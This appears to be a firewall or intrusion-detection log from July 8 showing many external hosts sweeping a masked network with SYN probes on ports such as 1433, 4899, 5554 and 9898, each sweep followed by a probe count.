Jul 8 19:52:21 212.239.30.80:1554 -> xxx.yyy.255.249:6129 SYN ******S*
Jul 8 19:52:21 212.239.30.80:1551 -> xxx.yyy.255.246:6129 SYN ******S*
Jul 8 19:52:21 212.239.30.80:1558 -> xxx.yyy.255.253:6129 SYN ******S*
Jul 8 19:52:21 212.239.30.80:1559 -> xxx.yyy.255.254:6129 SYN ******S*
Jul 8 19:52:21 212.239.30.80:1556 -> xxx.yyy.255.251:6129 SYN ******S*
Jul 8 19:52:21 212.239.30.80:1557 -> xxx.yyy.255.252:6129 SYN ******S*
70965

Jul 8 10:42:08 62.231.136.150:1782 -> xxx.yyy.1.1:15001 SYN ******S*
Jul 8 10:42:08 62.231.136.150:1783 -> xxx.yyy.1.2:15001 SYN ******S*
Jul 8 10:42:08 62.231.136.150:1784 -> xxx.yyy.1.3:15001 SYN ******S*
Jul 8 10:42:09 62.231.136.150:1785 -> xxx.yyy.1.4:15001 SYN ******S*
Jul 8 10:42:07 62.231.136.150:1786 -> xxx.yyy.1.5:15001 SYN ******S*
Jul 8 10:42:10 62.231.136.150:1787 -> xxx.yyy.1.6:15001 SYN ******S*
Jul 8 10:42:10 62.231.136.150:1788 -> xxx.yyy.1.7:15001 SYN ******S*
Jul 8 10:42:10 62.231.136.150:1789 -> xxx.yyy.1.8:15001 SYN ******S*
[...]
Jul 8 10:53:01 62.231.136.150:4401 -> xxx.yyy.255.219:15001 SYN ******S*
Jul 8 10:53:01 62.231.136.150:4398 -> xxx.yyy.255.216:15001 SYN ******S*
Jul 8 10:53:01 62.231.136.150:4659 -> xxx.yyy.255.223:15001 SYN ******S*
Jul 8 10:53:01 62.231.136.150:4664 -> xxx.yyy.255.228:15001 SYN ******S*
Jul 8 10:53:01 62.231.136.150:4661 -> xxx.yyy.255.225:15001 SYN ******S*
Jul 8 10:53:01 62.231.136.150:4668 -> xxx.yyy.255.232:15001 SYN ******S*
Jul 8 10:53:01 62.231.136.150:4665 -> xxx.yyy.255.229:15001 SYN ******S*
Jul 8 10:53:01 62.231.136.150:4662 -> xxx.yyy.255.226:15001 SYN ******S*
Jul 8 10:53:02 62.231.136.150:4679 -> xxx.yyy.255.243:15001 SYN ******S*
70529

Jul 8 07:58:46 211.220.191.43:2057 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 8 07:58:46 211.220.191.43:2058 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 8 07:58:43 211.220.191.43:2060 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 8 07:58:46 211.220.191.43:2061 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 8 07:58:43 211.220.191.43:2059 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 8 07:58:46 211.220.191.43:2062 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 8 07:58:46 211.220.191.43:2064 -> xxx.yyy.1.8:1433 SYN ******S*
Jul 8 07:58:46 211.220.191.43:2063 -> xxx.yyy.1.7:1433 SYN ******S*
[...]
Jul 8 08:10:24 211.220.191.43:4378 -> xxx.yyy.255.245:1433 SYN ******S*
Jul 8 08:10:24 211.220.191.43:4379 -> xxx.yyy.255.246:1433 SYN ******S*
Jul 8 08:10:24 211.220.191.43:4382 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 8 08:10:24 211.220.191.43:4383 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 8 08:10:24 211.220.191.43:4377 -> xxx.yyy.255.244:1433 SYN ******S*
Jul 8 08:10:24 211.220.191.43:4381 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 8 08:10:24 211.220.191.43:4384 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 8 08:10:24 211.220.191.43:4387 -> xxx.yyy.255.254:1433 SYN ******S*
70345

Jul 8 10:19:30 202.9.128.56:1560 -> xxx.yyy.1.1:8000 SYN ******S*
Jul 8 10:19:30 202.9.128.56:1561 -> xxx.yyy.1.2:8000 SYN ******S*
Jul 8 10:19:30 202.9.128.56:1562 -> xxx.yyy.1.3:8000 SYN ******S*
Jul 8 10:19:32 202.9.128.56:1563 -> xxx.yyy.1.4:8000 SYN ******S*
Jul 8 10:19:29 202.9.128.56:1564 -> xxx.yyy.1.5:8000 SYN ******S*
Jul 8 10:19:29 202.9.128.56:1565 -> xxx.yyy.1.6:8000 SYN ******S*
Jul 8 10:19:32 202.9.128.56:1566 -> xxx.yyy.1.7:8000 SYN ******S*
Jul 8 10:19:32 202.9.128.56:1567 -> xxx.yyy.1.8:8000 SYN ******S*
[...]
Jul 8 13:54:02 202.9.128.56:16701 -> xxx.yyy.237.3:1433 SYN ******S*
Jul 8 13:54:02 202.9.128.56:16716 -> xxx.yyy.240.131:1433 SYN ******S*
Jul 8 13:54:02 202.9.128.56:16724 -> xxx.yyy.244.82:1433 SYN ******S*
Jul 8 13:54:02 202.9.128.56:16754 -> xxx.yyy.244.247:1433 SYN ******S*
Jul 8 13:54:02 202.9.128.56:16784 -> xxx.yyy.248.33:1433 SYN ******S*
Jul 8 13:54:02 202.9.128.56:16831 -> xxx.yyy.248.37:1433 SYN ******S*
Jul 8 13:54:02 202.9.128.56:16846 -> xxx.yyy.248.45:1433 SYN ******S*
Jul 8 13:54:03 202.9.128.56:16892 -> xxx.yyy.248.165:1433 SYN ******S*
Jul 8 13:54:03 202.9.128.56:16900 -> xxx.yyy.252.95:1433 SYN ******S*
69012

Jul 8 21:09:25 68.161.179.104:3485 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 8 21:09:25 68.161.179.104:3486 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 8 21:09:22 68.161.179.104:3487 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 8 21:09:22 68.161.179.104:3488 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 8 21:09:22 68.161.179.104:3489 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 8 21:09:22 68.161.179.104:3490 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 8 21:09:25 68.161.179.104:3491 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 8 21:09:25 68.161.179.104:3492 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 8 21:25:28 68.161.179.104:3640 -> xxx.yyy.255.221:1433 SYN ******S*
Jul 8 21:25:28 68.161.179.104:3641 -> xxx.yyy.255.222:1433 SYN ******S*
Jul 8 21:25:28 68.161.179.104:3642 -> xxx.yyy.255.223:1433 SYN ******S*
Jul 8 21:25:28 68.161.179.104:3643 -> xxx.yyy.255.224:1433 SYN ******S*
Jul 8 21:25:28 68.161.179.104:3644 -> xxx.yyy.255.225:1433 SYN ******S*
Jul 8 21:25:28 68.161.179.104:3645 -> xxx.yyy.255.226:1433 SYN ******S*
Jul 8 21:25:28 68.161.179.104:3646 -> xxx.yyy.255.227:1433 SYN ******S*
Jul 8 21:25:28 68.161.179.104:3647 -> xxx.yyy.255.228:1433 SYN ******S*
68797

Jul 8 14:22:03 62.103.164.195:1556 -> xxx.yyy.1.1:5554 SYN ******S*
Jul 8 14:22:03 62.103.164.195:1557 -> xxx.yyy.1.2:5554 SYN ******S*
Jul 8 14:22:03 62.103.164.195:1558 -> xxx.yyy.1.3:5554 SYN ******S*
Jul 8 14:22:04 62.103.164.195:1559 -> xxx.yyy.1.4:5554 SYN ******S*
Jul 8 14:22:04 62.103.164.195:1560 -> xxx.yyy.1.5:5554 SYN ******S*
Jul 8 14:22:04 62.103.164.195:1561 -> xxx.yyy.1.6:5554 SYN ******S*
Jul 8 14:22:04 62.103.164.195:1562 -> xxx.yyy.1.7:5554 SYN ******S*
Jul 8 14:22:01 62.103.164.195:1563 -> xxx.yyy.1.8:5554 SYN ******S*
[...]
Jul 8 14:33:43 62.103.164.195:4184 -> xxx.yyy.255.246:5554 SYN ******S*
Jul 8 14:33:43 62.103.164.195:4188 -> xxx.yyy.255.250:5554 SYN ******S*
Jul 8 14:33:43 62.103.164.195:4187 -> xxx.yyy.255.249:5554 SYN ******S*
Jul 8 14:33:43 62.103.164.195:4185 -> xxx.yyy.255.247:5554 SYN ******S*
Jul 8 14:33:43 62.103.164.195:4189 -> xxx.yyy.255.251:5554 SYN ******S*
Jul 8 14:33:43 62.103.164.195:4190 -> xxx.yyy.255.252:5554 SYN ******S*
Jul 8 14:33:43 62.103.164.195:4186 -> xxx.yyy.255.248:5554 SYN ******S*
Jul 8 14:33:43 62.103.164.195:4192 -> xxx.yyy.255.254:5554 SYN ******S*
68135

Jul 8 07:10:11 155.230.106.128:1140 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 8 07:10:08 155.230.106.128:1141 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 8 07:10:08 155.230.106.128:1142 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 8 07:10:08 155.230.106.128:1143 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 8 07:10:08 155.230.106.128:1144 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 8 07:10:08 155.230.106.128:1145 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 8 07:10:08 155.230.106.128:1146 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 8 07:10:11 155.230.106.128:1148 -> xxx.yyy.1.9:1433 SYN ******S*
[...]
Jul 8 07:47:36 155.230.106.128:1199 -> xxx.yyy.255.243:1433 SYN ******S*
Jul 8 07:47:36 155.230.106.128:1201 -> xxx.yyy.255.245:1433 SYN ******S*
Jul 8 07:47:36 155.230.106.128:1202 -> xxx.yyy.255.246:1433 SYN ******S*
Jul 8 07:47:36 155.230.106.128:1203 -> xxx.yyy.255.247:1433 SYN ******S*
Jul 8 07:47:36 155.230.106.128:1205 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 8 07:47:36 155.230.106.128:1206 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 8 07:47:36 155.230.106.128:1208 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 8 07:47:36 155.230.106.128:1209 -> xxx.yyy.255.253:1433 SYN ******S*
Jul 8 07:47:36 155.230.106.128:1210 -> xxx.yyy.255.254:1433 SYN ******S*
61760

Jul 8 02:30:44 211.51.15.145:1197 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 8 02:30:44 211.51.15.145:1199 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 8 02:30:43 211.51.15.145:1200 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 8 02:30:43 211.51.15.145:1201 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 8 02:30:44 211.51.15.145:1198 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 8 02:30:43 211.51.15.145:1205 -> xxx.yyy.1.8:4899 SYN ******S*
Jul 8 02:30:45 211.51.15.145:1209 -> xxx.yyy.1.11:4899 SYN ******S*
Jul 8 02:30:44 211.51.15.145:1212 -> xxx.yyy.1.14:4899 SYN ******S*
[...]
Jul 8 02:34:56 211.51.15.145:1169 -> xxx.yyy.254.246:4899 SYN ******S*
Jul 8 02:34:56 211.51.15.145:1171 -> xxx.yyy.254.248:4899 SYN ******S*
Jul 8 02:34:56 211.51.15.145:1172 -> xxx.yyy.254.249:4899 SYN ******S*
Jul 8 02:34:56 211.51.15.145:1176 -> xxx.yyy.254.253:4899 SYN ******S*
Jul 8 02:34:57 211.51.15.145:4199 -> xxx.yyy.252.230:4899 SYN ******S*
Jul 8 02:34:57 211.51.15.145:4174 -> xxx.yyy.252.223:4899 SYN ******S*
Jul 8 02:34:57 211.51.15.145:4182 -> xxx.yyy.252.225:4899 SYN ******S*
Jul 8 02:34:57 211.51.15.145:4185 -> xxx.yyy.252.226:4899 SYN ******S*
Jul 8 02:34:57 211.51.15.145:4191 -> xxx.yyy.252.228:4899 SYN ******S*
44331

Jul 8 03:53:04 198.166.227.208:4538 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 8 03:53:04 198.166.227.208:4539 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 8 03:53:04 198.166.227.208:4540 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 8 03:53:03 198.166.227.208:4541 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 8 03:53:03 198.166.227.208:4542 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 8 03:53:03 198.166.227.208:4545 -> xxx.yyy.1.6:4899 SYN ******S*
Jul 8 03:53:03 198.166.227.208:4546 -> xxx.yyy.1.7:4899 SYN ******S*
Jul 8 03:53:03 198.166.227.208:4547 -> xxx.yyy.1.8:4899 SYN ******S*
[...]
Jul 8 03:57:19 198.166.227.208:1825 -> xxx.yyy.254.66:4899 SYN ******S*
Jul 8 03:57:19 198.166.227.208:1826 -> xxx.yyy.254.67:4899 SYN ******S*
Jul 8 03:57:19 198.166.227.208:1827 -> xxx.yyy.254.68:4899 SYN ******S*
Jul 8 03:57:19 198.166.227.208:1828 -> xxx.yyy.254.69:4899 SYN ******S*
Jul 8 03:57:19 198.166.227.208:1829 -> xxx.yyy.254.70:4899 SYN ******S*
Jul 8 03:57:19 198.166.227.208:1830 -> xxx.yyy.254.71:4899 SYN ******S*
Jul 8 03:57:19 198.166.227.208:1831 -> xxx.yyy.254.72:4899 SYN ******S*
Jul 8 03:57:19 198.166.227.208:1832 -> xxx.yyy.254.73:4899 SYN ******S*
Jul 8 03:57:19 198.166.227.208:1834 -> xxx.yyy.254.75:4899 SYN ******S*
44244

Jul 8 17:21:27 219.254.10.157:3897 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 8 17:21:27 219.254.10.157:3899 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 8 17:21:27 219.254.10.157:3901 -> xxx.yyy.1.7:4899 SYN ******S*
Jul 8 17:21:28 219.254.10.157:3905 -> xxx.yyy.1.11:4899 SYN ******S*
Jul 8 17:21:27 219.254.10.157:3906 -> xxx.yyy.1.12:4899 SYN ******S*
Jul 8 17:21:28 219.254.10.157:3896 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 8 17:21:27 219.254.10.157:3898 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 8 17:21:27 219.254.10.157:3900 -> xxx.yyy.1.6:4899 SYN ******S*
[...]
Jul 8 17:24:47 219.254.10.157:4828 -> xxx.yyy.255.244:4899 SYN ******S*
Jul 8 17:24:47 219.254.10.157:4829 -> xxx.yyy.255.245:4899 SYN ******S*
Jul 8 17:24:47 219.254.10.157:4831 -> xxx.yyy.255.247:4899 SYN ******S*
Jul 8 17:24:47 219.254.10.157:4832 -> xxx.yyy.255.248:4899 SYN ******S*
Jul 8 17:24:47 219.254.10.157:4833 -> xxx.yyy.255.249:4899 SYN ******S*
Jul 8 17:24:47 219.254.10.157:4835 -> xxx.yyy.255.251:4899 SYN ******S*
Jul 8 17:24:47 219.254.10.157:4837 -> xxx.yyy.255.253:4899 SYN ******S*
Jul 8 17:24:47 219.254.10.157:4836 -> xxx.yyy.255.252:4899 SYN ******S*
43648

Jul 8 21:40:57 216.177.21.38:4663 -> xxx.yyy.1.3:8000 SYN ******S*
Jul 8 21:40:57 216.177.21.38:4664 -> xxx.yyy.1.4:8000 SYN ******S*
Jul 8 21:40:57 216.177.21.38:4665 -> xxx.yyy.1.5:8000 SYN ******S*
Jul 8 21:40:57 216.177.21.38:4666 -> xxx.yyy.1.6:8000 SYN ******S*
Jul 8 21:40:57 216.177.21.38:4667 -> xxx.yyy.1.7:8000 SYN ******S*
Jul 8 21:40:57 216.177.21.38:4668 -> xxx.yyy.1.8:8000 SYN ******S*
Jul 8 21:40:57 216.177.21.38:4669 -> xxx.yyy.1.9:8000 SYN ******S*
Jul 8 21:40:57 216.177.21.38:4670 -> xxx.yyy.1.10:8000 SYN ******S*
[...]
Jul 8 21:46:07 216.177.21.38:3392 -> xxx.yyy.255.236:8000 SYN ******S*
Jul 8 21:46:07 216.177.21.38:3400 -> xxx.yyy.255.244:8000 SYN ******S*
Jul 8 21:46:07 216.177.21.38:3401 -> xxx.yyy.255.245:8000 SYN ******S*
Jul 8 21:46:07 216.177.21.38:3402 -> xxx.yyy.255.246:8000 SYN ******S*
Jul 8 21:46:07 216.177.21.38:3404 -> xxx.yyy.255.248:8000 SYN ******S*
Jul 8 21:46:07 216.177.21.38:3405 -> xxx.yyy.255.249:8000 SYN ******S*
Jul 8 21:46:07 216.177.21.38:3408 -> xxx.yyy.255.252:8000 SYN ******S*
Jul 8 21:46:07 216.177.21.38:3409 -> xxx.yyy.255.253:8000 SYN ******S*
Jul 8 21:46:07 216.177.21.38:3410 -> xxx.yyy.255.254:8000 SYN ******S*
36688

Jul 8 16:02:22 172.206.112.210:3968 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 8 16:02:22 172.206.112.210:3969 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 8 16:02:20 172.206.112.210:3970 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 8 16:02:20 172.206.112.210:3971 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 8 16:02:20 172.206.112.210:3972 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 8 16:02:20 172.206.112.210:3973 -> xxx.yyy.1.6:4899 SYN ******S*
Jul 8 16:02:20 172.206.112.210:3974 -> xxx.yyy.1.7:4899 SYN ******S*
Jul 8 16:02:20 172.206.112.210:3975 -> xxx.yyy.1.8:4899 SYN ******S*
[...]
Jul 8 16:09:20 172.206.112.210:1934 -> xxx.yyy.255.246:4899 SYN ******S*
Jul 8 16:09:20 172.206.112.210:1935 -> xxx.yyy.255.247:4899 SYN ******S*
Jul 8 16:09:20 172.206.112.210:1936 -> xxx.yyy.255.248:4899 SYN ******S*
Jul 8 16:09:20 172.206.112.210:1937 -> xxx.yyy.255.249:4899 SYN ******S*
Jul 8 16:09:20 172.206.112.210:1938 -> xxx.yyy.255.250:4899 SYN ******S*
Jul 8 16:09:20 172.206.112.210:1939 -> xxx.yyy.255.251:4899 SYN ******S*
Jul 8 16:09:20 172.206.112.210:1940 -> xxx.yyy.255.252:4899 SYN ******S*
Jul 8 16:09:20 172.206.112.210:1941 -> xxx.yyy.255.253:4899 SYN ******S*
Jul 8 16:09:20 172.206.112.210:1942 -> xxx.yyy.255.254:4899 SYN ******S*
36540

Jul 8 00:17:02 202.69.200.13:56070 -> xxx.yyy.1.98:6112 SYN ******S*
Jul 8 00:17:02 202.69.200.13:56043 -> xxx.yyy.1.72:6112 SYN ******S*
Jul 8 00:17:02 202.69.200.13:56040 -> xxx.yyy.1.69:6112 SYN ******S*
Jul 8 00:17:02 202.69.200.13:56042 -> xxx.yyy.1.71:6112 SYN ******S*
Jul 8 00:17:02 202.69.200.13:56036 -> xxx.yyy.1.65:6112 SYN ******S*
Jul 8 00:17:02 202.69.200.13:56034 -> xxx.yyy.1.63:6112 SYN ******S*
Jul 8 00:17:02 202.69.200.13:56033 -> xxx.yyy.1.62:6112 SYN ******S*
Jul 8 00:17:02 202.69.200.13:56032 -> xxx.yyy.1.61:6112 SYN ******S*
[...]
Jul 8 00:20:17 202.69.200.13:44513 -> xxx.yyy.255.213:6112 SYN ******S*
Jul 8 00:20:17 202.69.200.13:44511 -> xxx.yyy.255.211:6112 SYN ******S*
Jul 8 00:20:17 202.69.200.13:44507 -> xxx.yyy.255.207:6112 SYN ******S*
Jul 8 00:20:17 202.69.200.13:44501 -> xxx.yyy.255.201:6112 SYN ******S*
Jul 8 00:20:17 202.69.200.13:44493 -> xxx.yyy.255.193:6112 SYN ******S*
Jul 8 00:20:17 202.69.200.13:44503 -> xxx.yyy.255.203:6112 SYN ******S*
Jul 8 00:20:17 202.69.200.13:44500 -> xxx.yyy.255.200:6112 SYN ******S*
Jul 8 00:20:17 202.69.200.13:44480 -> xxx.yyy.255.180:6112 SYN ******S*
30752

Jul 8 00:15:14 61.179.116.241:17661 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 8 00:15:14 61.179.116.241:17662 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 8 00:15:12 61.179.116.241:17295 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 8 00:15:12 61.179.116.241:17297 -> xxx.yyy.1.7:4899 SYN ******S*
Jul 8 00:15:12 61.179.116.241:17299 -> xxx.yyy.1.9:4899 SYN ******S*
Jul 8 00:15:14 61.179.116.241:17683 -> xxx.yyy.1.11:4899 SYN ******S*
Jul 8 00:15:12 61.179.116.241:17303 -> xxx.yyy.1.13:4899 SYN ******S*
Jul 8 00:15:12 61.179.116.241:17305 -> xxx.yyy.1.15:4899 SYN ******S*
[...]
Jul 8 00:21:40 61.179.116.241:32605 -> xxx.yyy.254.244:4899 SYN ******S*
Jul 8 00:21:40 61.179.116.241:32616 -> xxx.yyy.254.246:4899 SYN ******S*
Jul 8 00:21:40 61.179.116.241:32618 -> xxx.yyy.254.248:4899 SYN ******S*
Jul 8 00:21:40 61.179.116.241:32620 -> xxx.yyy.254.250:4899 SYN ******S*
Jul 8 00:21:40 61.179.116.241:32622 -> xxx.yyy.254.252:4899 SYN ******S*
Jul 8 00:21:41 61.179.116.241:32162 -> xxx.yyy.253.115:4899 SYN ******S*
Jul 8 00:21:43 61.179.116.241:32557 -> xxx.yyy.254.202:4899 SYN ******S*
Jul 8 00:21:43 61.179.116.241:32561 -> xxx.yyy.254.206:4899 SYN ******S*
Jul 8 00:21:43 61.179.116.241:32559 -> xxx.yyy.254.204:4899 SYN ******S*
26548

Jul 8 08:38:43 61.178.57.50:3084 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 8 08:38:43 61.178.57.50:3086 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 8 08:38:43 61.178.57.50:3088 -> xxx.yyy.1.6:4899 SYN ******S*
Jul 8 08:38:45 61.178.57.50:3096 -> xxx.yyy.1.14:4899 SYN ******S*
Jul 8 08:38:45 61.178.57.50:3098 -> xxx.yyy.1.16:4899 SYN ******S*
Jul 8 08:38:44 61.178.57.50:3099 -> xxx.yyy.1.17:4899 SYN ******S*
Jul 8 08:38:43 61.178.57.50:3100 -> xxx.yyy.1.18:4899 SYN ******S*
Jul 8 08:38:45 61.178.57.50:3101 -> xxx.yyy.1.19:4899 SYN ******S*
[...]
Jul 8 08:43:14 61.178.57.50:4059 -> xxx.yyy.253.114:4899 SYN ******S*
Jul 8 08:43:14 61.178.57.50:4051 -> xxx.yyy.253.106:4899 SYN ******S*
Jul 8 08:43:14 61.178.57.50:4068 -> xxx.yyy.253.123:4899 SYN ******S*
Jul 8 08:43:14 61.178.57.50:4063 -> xxx.yyy.253.118:4899 SYN ******S*
Jul 8 08:43:14 61.178.57.50:4067 -> xxx.yyy.253.122:4899 SYN ******S*
Jul 8 08:43:14 61.178.57.50:4062 -> xxx.yyy.253.117:4899 SYN ******S*
Jul 8 08:43:14 61.178.57.50:4064 -> xxx.yyy.253.119:4899 SYN ******S*
Jul 8 08:43:14 61.178.57.50:4048 -> xxx.yyy.253.103:4899 SYN ******S*
23077

Jul 8 03:43:34 61.172.22.240:3916 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 8 03:43:34 61.172.22.240:3961 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 8 03:43:34 61.172.22.240:3965 -> xxx.yyy.1.8:4899 SYN ******S*
Jul 8 03:43:34 61.172.22.240:3966 -> xxx.yyy.1.9:4899 SYN ******S*
Jul 8 03:43:34 61.172.22.240:3974 -> xxx.yyy.1.17:4899 SYN ******S*
Jul 8 03:43:34 61.172.22.240:3979 -> xxx.yyy.1.22:4899 SYN ******S*
Jul 8 03:43:34 61.172.22.240:3980 -> xxx.yyy.1.23:4899 SYN ******S*
Jul 8 03:43:34 61.172.22.240:3981 -> xxx.yyy.1.24:4899 SYN ******S*
[...]
Jul 8 03:48:07 61.172.22.240:3262 -> xxx.yyy.254.233:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3264 -> xxx.yyy.254.235:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3267 -> xxx.yyy.254.238:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3276 -> xxx.yyy.254.247:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3277 -> xxx.yyy.254.248:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3278 -> xxx.yyy.254.249:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3280 -> xxx.yyy.254.251:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3281 -> xxx.yyy.254.252:4899 SYN ******S* Jul 8 03:48:07 61.172.22.240:3282 -> xxx.yyy.254.253:4899 SYN ******S* 19258 Jul 8 09:59:06 217.165.60.135:4206 -> xxx.yyy.1.14:4899 SYN ******S* Jul 8 09:59:08 217.165.60.135:4205 -> xxx.yyy.1.13:4899 SYN ******S* Jul 8 09:59:08 217.165.60.135:4207 -> xxx.yyy.1.15:4899 SYN ******S* Jul 8 09:59:06 217.165.60.135:4208 -> xxx.yyy.1.16:4899 SYN ******S* Jul 8 09:59:06 217.165.60.135:4209 -> xxx.yyy.1.17:4899 SYN ******S* Jul 8 09:59:08 217.165.60.135:4210 -> xxx.yyy.1.18:4899 SYN ******S* Jul 8 09:59:07 217.165.60.135:4211 -> xxx.yyy.1.19:4899 SYN ******S* Jul 8 09:59:07 217.165.60.135:4212 -> xxx.yyy.1.20:4899 SYN ******S* [...] 
Jul 8 10:08:29 217.165.60.135:3214 -> xxx.yyy.90.103:4899 SYN ******S* Jul 8 10:08:29 217.165.60.135:3212 -> xxx.yyy.90.101:4899 SYN ******S* Jul 8 10:08:29 217.165.60.135:3211 -> xxx.yyy.90.100:4899 SYN ******S* Jul 8 10:08:29 217.165.60.135:3213 -> xxx.yyy.90.102:4899 SYN ******S* Jul 8 10:08:30 217.165.60.135:3218 -> xxx.yyy.90.107:4899 SYN ******S* Jul 8 10:08:30 217.165.60.135:3216 -> xxx.yyy.90.105:4899 SYN ******S* Jul 8 10:08:30 217.165.60.135:3217 -> xxx.yyy.90.106:4899 SYN ******S* Jul 8 10:08:30 217.165.60.135:3215 -> xxx.yyy.90.104:4899 SYN ******S* Jul 8 10:08:30 217.165.60.135:3219 -> xxx.yyy.90.108:4899 SYN ******S* 16283 Jul 8 23:55:48 220.87.13.46:3704 -> xxx.yyy.194.157:5554 SYN ******S* Jul 8 23:55:49 220.87.13.46:4238 -> xxx.yyy.194.157:1023 SYN ******S* Jul 8 23:55:48 220.87.13.46:3703 -> xxx.yyy.194.159:5554 SYN ******S* Jul 8 23:55:49 220.87.13.46:4236 -> xxx.yyy.194.159:1023 SYN ******S* Jul 8 23:55:48 220.87.13.46:3705 -> xxx.yyy.194.156:5554 SYN ******S* Jul 8 23:55:49 220.87.13.46:4239 -> xxx.yyy.194.156:1023 SYN ******S* Jul 8 23:55:48 220.87.13.46:3711 -> xxx.yyy.194.153:5554 SYN ******S* Jul 8 23:55:49 220.87.13.46:4242 -> xxx.yyy.194.153:1023 SYN ******S* [...] 
Jul 8 23:56:42 220.87.13.46:2326 -> xxx.yyy.214.107:9898 SYN ******S* Jul 8 23:56:42 220.87.13.46:2327 -> xxx.yyy.214.106:9898 SYN ******S* Jul 8 23:56:42 220.87.13.46:2329 -> xxx.yyy.214.102:9898 SYN ******S* Jul 8 23:56:42 220.87.13.46:2341 -> xxx.yyy.214.122:9898 SYN ******S* Jul 8 23:56:42 220.87.13.46:2344 -> xxx.yyy.214.119:9898 SYN ******S* Jul 8 23:56:42 220.87.13.46:2355 -> xxx.yyy.214.95:9898 SYN ******S* Jul 8 23:56:42 220.87.13.46:2359 -> xxx.yyy.214.99:9898 SYN ******S* Jul 8 23:56:42 220.87.13.46:2360 -> xxx.yyy.214.105:9898 SYN ******S* 15215 Jul 8 00:44:24 221.192.35.112:3922 -> xxx.yyy.154.103:5554 SYN ******S* Jul 8 00:44:25 221.192.35.112:4273 -> xxx.yyy.154.103:1023 SYN ******S* Jul 8 00:44:24 221.192.35.112:3924 -> xxx.yyy.154.105:5554 SYN ******S* Jul 8 00:44:25 221.192.35.112:4275 -> xxx.yyy.154.105:1023 SYN ******S* Jul 8 00:44:24 221.192.35.112:3923 -> xxx.yyy.154.104:5554 SYN ******S* Jul 8 00:44:25 221.192.35.112:4274 -> xxx.yyy.154.104:1023 SYN ******S* Jul 8 00:44:24 221.192.35.112:3933 -> xxx.yyy.154.247:5554 SYN ******S* Jul 8 00:44:25 221.192.35.112:4287 -> xxx.yyy.154.247:1023 SYN ******S* [...] 
Jul 8 00:45:46 221.192.35.112:3378 -> xxx.yyy.154.226:9898 SYN ******S* Jul 8 00:45:46 221.192.35.112:3336 -> xxx.yyy.154.218:9898 SYN ******S* Jul 8 00:45:46 221.192.35.112:3380 -> xxx.yyy.154.229:9898 SYN ******S* Jul 8 00:45:46 221.192.35.112:3385 -> xxx.yyy.154.216:9898 SYN ******S* Jul 8 00:45:46 221.192.35.112:3386 -> xxx.yyy.154.234:9898 SYN ******S* Jul 8 00:45:46 221.192.35.112:3388 -> xxx.yyy.154.238:9898 SYN ******S* Jul 8 00:45:46 221.192.35.112:3391 -> xxx.yyy.154.212:9898 SYN ******S* Jul 8 00:45:46 221.192.35.112:3408 -> xxx.yyy.154.239:9898 SYN ******S* 12641 Jul 8 00:56:43 61.55.196.247:2838 -> xxx.yyy.174.3:5554 SYN ******S* Jul 8 00:56:44 61.55.196.247:3360 -> xxx.yyy.174.3:1023 SYN ******S* Jul 8 00:56:43 61.55.196.247:2840 -> xxx.yyy.174.5:5554 SYN ******S* Jul 8 00:56:44 61.55.196.247:3362 -> xxx.yyy.174.5:1023 SYN ******S* Jul 8 00:56:43 61.55.196.247:2842 -> xxx.yyy.174.7:5554 SYN ******S* Jul 8 00:56:44 61.55.196.247:3357 -> xxx.yyy.174.7:1023 SYN ******S* Jul 8 00:56:43 61.55.196.247:2843 -> xxx.yyy.174.8:5554 SYN ******S* 